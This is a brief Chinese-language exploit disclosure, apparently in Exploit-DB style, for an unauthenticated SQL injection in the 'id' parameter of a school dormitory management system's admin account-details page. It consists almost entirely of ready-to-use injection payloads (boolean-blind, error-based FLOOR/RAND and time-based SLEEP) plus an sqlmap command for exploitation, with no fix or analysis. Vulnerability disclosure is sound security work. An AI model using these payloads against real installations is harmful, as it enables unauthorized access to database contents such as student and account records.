学校宿舍管理系统 1.0 - 未认证SQL注入
[#] 漏洞位置:
$_GET['id'] 位于 /dms/admin/accounts/view_details.php:4
参数:id (GET) 类型:基于布尔的盲注 标题:AND 布尔型盲注 - WHERE 或 HAVING 子句 载荷:page=accounts/view_details&id=2' AND 8853=8853 AND 'kujz'='kujz
类型:基于错误的注入
标题:MySQL >= 5.0 基于错误的注入 - WHERE, HAVING, ORDER BY 或 GROUP BY 子句 (FLOOR)
载荷:page=accounts/view_details&id=2' AND (SELECT 8739 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8739=8739,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'fkLf'='fkLf
类型:基于时间的盲注
标题:MySQL >= 5.0.12 基于时间的盲注 (查询 SLEEP)
载荷:page=accounts/view_details&id=2' AND (SELECT 7339 FROM (SELECT(SLEEP(5)))Dkxx) AND 'UZCm'='UZCm
[#] 利用SQLMAP进行漏洞利用:
sqlmap -u "http://localhost/dms/admin/?page=accounts/view_details&id=2" --dbms=mysql